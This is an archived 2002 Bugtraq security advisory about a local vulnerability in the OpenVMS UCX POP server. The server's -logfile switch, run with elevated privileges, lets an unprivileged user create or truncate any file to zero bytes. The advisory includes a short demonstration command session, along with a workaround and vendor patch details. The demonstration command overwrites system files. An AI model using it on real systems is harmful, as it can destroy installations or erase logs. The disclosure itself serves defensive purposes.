Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

OpenVMS POP server local vulnerability

From: "Mike Riley" <mike () akitanet co uk>
Date: Fri, 27 Sep 2002 13:26:10 +0100
Akita Security Advisory 27/09/2002
OpenVMS UCX$POP_SERVER.EXE vulnerability

Advisory:
http://www.akita-security.co.uk/VMS/ucx_pop_server.txt

VMS security tool
http://www.akita-security.co.uk/stoat


Overview
========

UCX is the main TCP/IP stack for OpenVMS.  Akita Security have
discovered a vulnerability in every version of the UCX pop
server which allows a local user to overwrite any file on the
system with a 0 byte file.

Due to the popularity of UCX this problem will be widespread
amongst OpenVMS installations.

This issue was discovered as part of wider research into OpenVMS
security.  Many issues have been found, and further advisories
will be released shortly.

Detail
======

The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is
installed with the VMS privileges BYPASS and SYSPRV:

INSTALL> list ucx$pop_server.exe /full

DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE
   UCX$POP_SERVER;1               Prv
        Entry access count         = 1
        Privileges = SYSPRV BYPASS

INSTALL>

The BYPASS privilege allows the pop server to override filesystem
permissions.  By use of the -logfile commandline switch, it is
possible to persuade the server to open a file anywhere, or to
truncate an existing file, as follows:

____________________________________________________________________

$ show process/privs

25-SEP-2002 10:47:35.02   User: MIKE             Process ID:
0000013F
                          Node: VAX              Process name:
"_TNA21:_1"

Authorized privileges:
 NETMBX    TMPMBX

Process privileges:
 NETMBX               may create network device
 TMPMBX               may create temporary mailbox

Process rights:
 INTERACTIVE
 REMOTE

System rights:
 SYS$NODE_VAX
$
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
19102-09-24 17:41:39 sizeof(block_wait_times) 160
19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32
19102-09-24 17:41:40 num_elems 5
[SNIP]
^C
$ dir/prot sys$system:I_*

Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1
                   insufficient privilege or object protection
violation

Total of 1 file.
$
____________________________________________________________________

The file created looks like this:
____________________________________________________________________

Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1       File ID:  (9499,485,0)
Size:            0/0          Owner:    [SYSTEM]
Created:   24-SEP-2002 17:41:41.14
Revised:   24-SEP-2002 17:41:57.09 (1)
Expires:   <None specified>
Backup:    <No backup recorded>
Effective: <None specified>
Recording: <None specified>
File organization:  Sequential
Shelved state:      Online
File attributes:    Allocation: 0, Extend: 0, Global buffer count: 0
                    No version limit
Record format:      Stream_LF, maximum 0 bytes, longest 32767 bytes
Record attributes:  Carriage return carriage control
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

Total of 1 file, 0/0 blocks.
$
____________________________________________________________________

Severity
========

At the least, this bug could be used by a local user to destroy an
OpenVMS installation, or overwrite logfiles.  If a local user could
control the log output of the pop server it could probably be used
to gain full privileges, although this is speculation on our part.


Workaround
==========

Remove world execute permissions for the pop server binary.

Vendor status
=============

Akita Security informed Compaq of this vulnerability on 14/06/2002.
Compaq have released an ECO which corrects the problem:
____________________________________________________________________

ECO B 1-JUL-2002 Alpha and VAX

Problem:

Disable the "-logfile" command line switch, which is not needed on
OpenVMS.

Deliverables:

TCPIP$POP_SERVER.EXE V5.3-18B

Reference:

Internal testing.
____________________________________________________________________

Please note the lack of reference to a security problem, and the
lack of credit to Akita Security.  Internal testing ?

Credit
======

This issue was discovered by mike () akita co uk



--
Mike Riley - Security Systems manager @ Akita
http://www.akita-security.co.uk
--------------------------------------------------------------------
Sales: T:+44(0)1869 320111 F: +44(0)1869250688 E: sales () akita co uk
Tech: T: +44(0)1869 320111 E: mike () akita co uk
--------------------------------------------------------------------
"Security, performance, cost - pick two"
Previous By Date Next
Previous By Thread Next

Current thread: